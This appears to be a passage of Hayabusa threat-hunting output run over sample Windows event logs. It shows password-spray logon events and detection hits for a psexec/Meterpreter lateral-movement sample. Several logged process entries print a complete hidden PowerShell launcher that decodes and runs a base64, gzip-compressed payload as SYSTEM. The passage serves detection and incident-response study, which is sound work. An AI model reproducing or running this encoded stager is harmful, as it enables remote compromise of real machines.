LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:30.262 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:31.362 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:32.419 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:33.499 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:34.577 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:35.670 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:36.716 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:37.815 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:38.872 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:39.954 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:41.028 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:42.075 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:43.142 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:44.208 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:45.284 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:46.379 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:47.433 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:48.512 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:49.576 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:50.656 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:51.729 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:52.823 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:53.886 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:54.942 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:56.019 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:57.107 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:58.193 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:31:59.253 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:00.320 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:01.393 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:02.451 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:03.525 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:03.525 +00:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:jlake/bking/cspizor/cragoso/dmashburn/bgalbraith/smisenar/bgreenwood/jorchilles/mdouglas/ssims/baker/drook/edygert IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- +2019-04-30 19:32:04.597 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:05.675 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:06.738 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:07.835 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:08.911 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:09.973 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:11.051 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:12.146 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:13.221 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:14.281 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:15.352 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:16.402 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 19:32:17.474 +00:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-04-30 20:26:51.793 +00:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:51.981 +00:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,rules/sigma/registry_sysmon/registry_set/registry_set_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:51.981 +00:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,rules/sigma/registry_sysmon/registry_set/registry_set_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.090 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-04-30 20:26:52.106 +00:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 